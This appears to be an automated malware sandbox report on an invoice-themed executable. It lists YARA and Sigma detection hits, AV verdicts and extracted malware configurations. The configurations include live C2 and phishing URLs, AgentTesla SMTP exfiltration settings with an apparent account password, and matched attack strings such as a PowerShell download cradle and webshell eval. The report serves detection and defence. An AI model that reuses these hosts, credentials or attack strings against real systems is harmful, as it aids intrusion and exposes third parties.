35.3.MpSigStub.exe.28bd780418a.26.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x3f7b0:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd780418a.26.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xef59e:$x1: donate.ssl.xmrig.com
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_CoronaCrypt	Yara detected CoronaCrypt Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Gocoder	Yara detected Gocoder ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.26.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x36ae9f:$: OnlineTime= 0x36aedd:$: clientpath= 0x36aeec:$: serverpath=
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x15287a:$xs1: WS2_32.dll 0x453315:$xs2: ReflectiveLoader
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x4da150:$substring: AAAAYInlM 0x4da14c:$pattern1: /OiCAAAAYInlM
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x315a02:$r2: p^ower^shell
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x453315:$x1: ReflectiveLoader
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0xc1067:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x3b1060:$s1: "c" & "r" & "i" & "p" & "t"
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x411b02:$x1: IEX ((new-object net.webclient).download 0x411b55:$x1: IEX ((new-object net.webclient).download 0x411ba9:$x1: IEX ((new-object net.webclient).download 0x411c0a:$x1: IEX ((new-object net.webclient).download
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0xadcc3:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xadd1e:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xae06a:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xae0c5:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xb036c:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0xbe7fd:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0xbe81f:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x16de1:$s2: sekurlsa::wdigest 0x16d12:$s6: sekurlsa::livessp 0x16d57:$s9: sekurlsa::process 0x16d9c:$s12: sekurlsa::tickets 0x16ccd:$s15: sekurlsa::credman
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	APT_Backdoor_Win_GORAT_5	unknown	FireEye	0x172b6d:$1: comms.BeaconData 0x172b82:$2: comms.CommandResponse 0x172b9c:$3: rat.BaseChannel 0x172bb0:$4: rat.Config 0x172bbf:$5: rat.Core 0x172bcc:$6: platforms.AgentPlatform 0x172be8:$7: GetHostID 0x172bf6:$8: /rat/cmd/gorat_shared/dllmain.go
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x2bf2c7:$pdb1: \ADPassHunt\ 0x2bf2d8:$pdb2: \ADPassHunt.pdb 0x2bf2ec:$s1: Usage: .\ADPassHunt.exe 0x2bf308:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x2bf348:$s3: [ADA] Searching for accounts with userpassword attribute 0x2bf385:$s4: [GPP] Searching for passwords now
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	ChinaChopper_Generic	China Chopper Webshells - PHP and ASPX	Florian Roth	0x42ce29:$php: php @eval($_POST[
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x1f521c:$one6: Shell Environ$("COMSPEC") & " /c 0x1f52e3:$one6: Shell Environ$("COMSPEC") & " /c 0x1f5866:$one6: Shell Environ$("COMSPEC") & " /c 0x1f5887:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x1f5819:$two5: NullRefrencedException 0x1f5831:$two6: error has occurred in user32.dll by 0x1f5819:$two7: NullRefrencedException
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x3f7352:$r1: teSlortnoCtnerruC
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Jigsaw	Yara detected Jigsaw	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_mock	Yara detected Mock Ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_MaliciousMacro	Yara detected MaliciousMacro	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0xc4c9a:$: OnlineTime= 0xc4cd8:$: clientpath= 0xc4ce7:$: serverpath=
35.3.MpSigStub.exe.28bd780418a.59.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x3f8a7f:$xs1: WS2_32.dll 0x1772b0:$xs2: ReflectiveLoader 0x292da9:$xs2: ReflectiveLoader
35.3.MpSigStub.exe.28bd780418a.59.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x1772b0:$x1: ReflectiveLoader 0x292da9:$x1: ReflectiveLoader
35.3.MpSigStub.exe.28bd780418a.59.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x36726c:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
35.3.MpSigStub.exe.28bd780418a.59.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x3ee40:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd780418a.59.unpack	Amplia_Security_Tool	Amplia Security Tool	unknown	0xf122e:$a: Amplia Security 0xf12fb:$e: extract the TGT session key
35.3.MpSigStub.exe.28bd780418a.59.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x353ec8:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x353f23:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x35426f:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3542ca:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x356571:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
35.3.MpSigStub.exe.28bd780418a.59.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x364a02:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x364a24:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
35.3.MpSigStub.exe.28bd780418a.59.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x3ee40:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
35.3.MpSigStub.exe.28bd780418a.59.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2bcfe6:$s2: sekurlsa::wdigest 0x2bcf17:$s6: sekurlsa::livessp 0x2bcf5c:$s9: sekurlsa::process 0x2bcfa1:$s12: sekurlsa::tickets 0x2bced2:$s15: sekurlsa::credman
35.3.MpSigStub.exe.28bd780418a.59.unpack	APT_Backdoor_Win_GORAT_5	unknown	FireEye	0x418d72:$1: comms.BeaconData 0x418d87:$2: comms.CommandResponse 0x418da1:$3: rat.BaseChannel 0x418db5:$4: rat.Config 0x418dc4:$5: rat.Core 0x418dd1:$6: platforms.AgentPlatform 0x418ded:$7: GetHostID 0x418dfb:$8: /rat/cmd/gorat_shared/dllmain.go
35.3.MpSigStub.exe.28bd780418a.59.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xb6a2c:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xb6909:$rat2: rat.(Core).generateBeacon 0xb6926:$rat3: rat.gJitter 0xb6934:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xb699a:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xb6a02:$rat8: rat/modules/netsweeper.(Pinger).listen 0xb6a2c:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xb6a5a:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xb68e0:$winblows: rat/platforms/win.(winblows).GetStage
35.3.MpSigStub.exe.28bd780418a.59.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x3f7b0:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd780418a.59.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x49b421:$one6: Shell Environ$("COMSPEC") & " /c 0x49b4e8:$one6: Shell Environ$("COMSPEC") & " /c 0x49ba6b:$one6: Shell Environ$("COMSPEC") & " /c 0x49ba8c:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x49ba1e:$two5: NullRefrencedException 0x49ba36:$two6: error has occurred in user32.dll by 0x49ba1e:$two7: NullRefrencedException
35.3.MpSigStub.exe.28bd780418a.59.unpack	HKTL_NET_GUID_CsharpAmsiBypass	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x1910b7:$typelibguid0: 4ab3b95d-373c-4197-8ee3-fe0fa66ca122
35.3.MpSigStub.exe.28bd780418a.59.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x3f7b0:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
35.3.MpSigStub.exe.28bd780418a.59.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xef59e:$x1: donate.ssl.xmrig.com
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_CoronaCrypt	Yara detected CoronaCrypt Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Gocoder	Yara detected Gocoder ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
35.3.MpSigStub.exe.28bd780418a.59.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x36ae9f:$: OnlineTime= 0x36aedd:$: clientpath= 0x36aeec:$: serverpath=
Click to see the 423 entries

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 188.93.227.195, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 420, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49795

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php	Avira URL Cloud: Label: phishing
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	Malware Configuration Extractor: Pony {"C2 list": ["http://batrasiaku.blogspot.com/", "http://%s/files/", "http://u.to/PbrTEg", "http://%s:%i%s", "http://www.goldwindos2000.com/krratwo/hker.htm", "http://www.bluelook.es/bvvtbbh.php", "http://instituthypnos.com/maps1316/ki_d/", "http://cs.zhongsou.com/", "http://203.199.200.61", "http://31.192.209.", "http://92.222.7.", "http://animefrase.blogspot.com/", "http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg", "http://46.101.202.232/wp-includes/mx_ib/", "http://worm.ws", "http://bonkersmen.blogspot.com/", "http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=", "http://110.42.4.180:", "http://3dplayful.blogspot.com/ ", "http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg", "http://www.trotux.com/?z=", "http://cts.hotbar.com/trackedevent.aspx", "http://www.3322.org/dyndns/getip", "http://%s%simg.jpg", "http://8nasrcity.blogspot.com/ ", "http://cicahroti.blogspot.com/ ", "http://www.norton-kaspersky.com/trf/tools", "http://www.xpassgenerator.com/software/d", "http://3dcpw.net/house/404.htm", "http://f1visa.info/cd/cd.php?id=%s&ver=g", "http://tool.world2.cn/toolbar/", "http://72.29.80.113/~nossacai/", "http://scud.pipis.net/", "http://best4hack.blogspot.com/ ", "http://update.7h4uk.com:443/antivirus.php", "http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg", "http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg", "http://greenertrack.info/.well-known/acme-challenge/hp.gf", "http://goatse.ragingfist.net/", "http://citw-vol2.blogspot.com/ ", "http://%s:%d/PUT[%s]/FC001/%s", "http://oo.shmtb.info:888/phone.exe\\soft", "http://32player.com", "http://31.192.211.", "http://200.159.128.", "http://www.klikspaandelft.nl/", "http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php", "http://march262020.club/files/", "http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://nownowsales.com/wp-admin/ulpbz/", "http://errors.statsmyapp.com", "http://metznr.co/tor/index.php", "http://w.woc4b.com", "http://spotdewasa.blogspot.com/", "http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq", "http://dudethisishowwedoitallnightlong.2myip.net", "http://www.staging.pashminadevelopers.com/wp-admin/g_j/", "http://down.admin7a57a5a743894a0e.club/4.exe", "http://downloadfilesldr.com/index2.php?adv=141", "http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp", "http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/", "http://articlunik.blogspot.com/", "http://www.webflora.co.kr/slog/skin/setup.ini", "http://%domain%/config.php", "http://pig.zhongsou.com/helpsimple/help.htm", "http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk", "http://%s?u=%s&m=%s&action=find", "http://www.jplineage.com/firo/mail.asp?tomail=163@163.com&mailbody=", "http://update.xiaoshoupeixun.com/tsbho.ini
Source: conhost.exe.3892.43.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "margaridasantos@tccinfaes.comTccBps1427logmail.tccinfaes.comkevinlog25@gmail.com"}
Source: MpSigStub.exe.7120.35.memstrmin	Malware Configuration Extractor: CryLock {"Extensions": "trigger reboot 6[CC-Client] Command: REBOOT received"}

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Multi AV Scanner detection for submitted file

Show sources

Source: FAKTURA I PARAGONY.exe	Virustotal: Detection: 44%			Perma Link
Source: FAKTURA I PARAGONY.exe	ReversingLabs: Detection: 26%

Yara detected Njrat

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Multi AV Scanner detection for domain / URL

Show sources

Source: mail.tccinfaes.com

Virustotal: Detection: 11%

Perma Link

Source: 35.3.MpSigStub.exe.28bd62ff37e.139.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd62c32d4.74.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd62c32d4.170.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd62c283a.76.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd62c283a.171.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd7850ae6.50.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 35.3.MpSigStub.exe.28bd62c2d87.75.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd62c2d87.172.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

Yara detected Hancitor

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC93E0 CryptUnprotectData,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC99B8 CryptUnprotectData,

